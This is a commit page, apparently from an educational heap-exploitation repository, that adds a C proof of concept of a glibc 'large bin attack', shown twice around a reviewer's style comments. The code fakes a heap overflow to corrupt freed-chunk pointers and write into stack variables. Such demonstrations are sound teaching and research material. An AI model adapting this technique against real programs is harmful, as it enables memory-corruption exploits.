added POC for large bin attack and updated Makefile
Sajjad Arshad
committed
Sep 27, 2018
1 parent
e53e502
commit 37b71d0
Showing
3 changed files
with
144 additions
and
2 deletions.
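--- /dev/null
+++ b/PATH_NOT_SHOWN_ON_PAGE
@@ -0,0 +1,71 @@
+#include<stdio.h>
+#include<stdlib.h>
+
+int main()
+{
+fprintf(stderr, "This file demonstrates large bin attack by writing a large unsigned long value into stack\n");
+fprintf(stderr, "In practice, large bin attack is generally prepared for further attacks, such as rewriting the "
+"global variable global_max_fast in libc for further fastbin attack\n\n");
+
+unsigned long stack_var1 = 0;
+unsigned long stack_var2 = 0;
+
+fprintf(stderr, "Let's first look at the targets we want to rewrite on stack:\n");
+fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
+fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);
+
+unsigned long *p1 = malloc(0x320);
+fprintf(stderr, "Now, we allocate the first large chunk on the heap at: %p\n", p1 - 2);
+
+fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
+" the first large chunk during the free()\n\n");
+malloc(0x20);
+
+unsigned long *p2 = malloc(0x400);
+fprintf(stderr, "Then, we allocate the second large chunk on the heap at: %p\n", p2 - 2);
+
+fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
+" the second large chunk during the free()\n\n");
+malloc(0x20);
+
+unsigned long *p3 = malloc(0x400);
+fprintf(stderr, "Finally, we allocate the third large chunk on the heap at: %p\n", p3 - 2);
+
+fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the top chunk with"
+" the third large chunk during the free()\n\n");
+malloc(0x20);
+
+free(p1);
+free(p2);
+fprintf(stderr, "We free the first and second large chunks now and they will be inserted in the unsorted bin:"
+" %p --> %p\n\n", (void *)(p2 - 2), (void *)(p1 - 2));
+
+malloc(0x90);
+fprintf(stderr, "Now, we allocate a chunk with a size smaller than the freed first large chunk. This will move the"
+" freed second large chunk into the large bin, use parts of the freed first large chunk for allocation, and"
+" reinsert the remaining of the freed first large chunk into the unsorted bin:"
+" %p\n\n", (void *)((char *)p1 + 0x90));
+
+free(p3);
+
+//------------VULNERABILITY-----------
+
+fprintf(stderr, "Now emulating a vulnerability that can overwrite the freed second large chunk's \"size\""
+" as well as its \"bk\" and \"bk_nextsize\" pointers\n");
+
+p2[-1] = 0x3f1;
+p2[0] = 0;
+p2[2] = 0;
+p2[1] = (unsigned long)(&stack_var1 - 2);
+p2[3] = (unsigned long)(&stack_var2 - 4);
+
+//------------------------------------
+
+malloc(0x90);
+
+fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, target should has already been rewrite:\n");
+fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
+fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);
+
+return 0;
+}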
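Review bot: The two target dumps near the top of main pass `unsigned long` arguments to `%ld` (`fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);`), which is a signed/unsigned conversion mismatch; `%lu` is the matching specifier, and the final dump at the bottom already avoids the problem by casting to `void *`. The three chunk-address prints (`p1 - 2`, `p2 - 2`, `p3 - 2`) hand `%p` an `unsigned long *` without the `(void *)` cast that the later free() message uses, so adding the same cast there would make the file consistent and standard-conforming. The overwrite block sets `0x3f1` and the `-2`/`-4` pointer offsets with no explanation; a one-line comment stating which libc layout these constants assume would help readers, since the demonstration presumably does not carry over to other versions unchanged. The second file section on this page carries identical code and the same points apply there.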
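--- /dev/null
+++ b/PATH_NOT_SHOWN_ON_PAGE
@@ -0,0 +1,71 @@
+#include<stdio.h>
+#include<stdlib.h>
+
+int main()
+{
+fprintf(stderr, "This file demonstrates large bin attack by writing a large unsigned long value into stack\n");
+fprintf(stderr, "In practice, large bin attack is generally prepared for further attacks, such as rewriting the "
+"global variable global_max_fast in libc for further fastbin attack\n\n");
+
+unsigned long stack_var1 = 0;
+unsigned long stack_var2 = 0;
+
+fprintf(stderr, "Let's first look at the targets we want to rewrite on stack:\n");
+fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
+fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);
+
+unsigned long *p1 = malloc(0x320);
+fprintf(stderr, "Now, we allocate the first large chunk on the heap at: %p\n", p1 - 2);
+
+fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
+" the first large chunk during the free()\n\n");
+malloc(0x20);
+
+unsigned long *p2 = malloc(0x400);
+fprintf(stderr, "Then, we allocate the second large chunk on the heap at: %p\n", p2 - 2);
+
+fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
+" the second large chunk during the free()\n\n");
+malloc(0x20);
+
+unsigned long *p3 = malloc(0x400);
+fprintf(stderr, "Finally, we allocate the third large chunk on the heap at: %p\n", p3 - 2);
+
+fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the top chunk with"
+" the third large chunk during the free()\n\n");
+malloc(0x20);
+
+free(p1);
+free(p2);
+fprintf(stderr, "We free the first and second large chunks now and they will be inserted in the unsorted bin:"
+" %p --> %p\n\n", (void *)(p2 - 2), (void *)(p1 - 2));
+
+malloc(0x90);
+fprintf(stderr, "Now, we allocate a chunk with a size smaller than the freed first large chunk. This will move the"
+" freed second large chunk into the large bin, use parts of the freed first large chunk for allocation, and"
+" reinsert the remaining of the freed first large chunk into the unsorted bin:"
+" %p\n\n", (void *)((char *)p1 + 0x90));
+
+free(p3);
+
+//------------VULNERABILITY-----------
+
+fprintf(stderr, "Now emulating a vulnerability that can overwrite the freed second large chunk's \"size\""
+" as well as its \"bk\" and \"bk_nextsize\" pointers\n");
+
+p2[-1] = 0x3f1;
+p2[0] = 0;
+p2[2] = 0;
+p2[1] = (unsigned long)(&stack_var1 - 2);
+p2[3] = (unsigned long)(&stack_var2 - 4);
+
+//------------------------------------
+
+malloc(0x90);
+
+fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, target should has already been rewrite:\n");
+fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
+fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);
+
+return 0;
+}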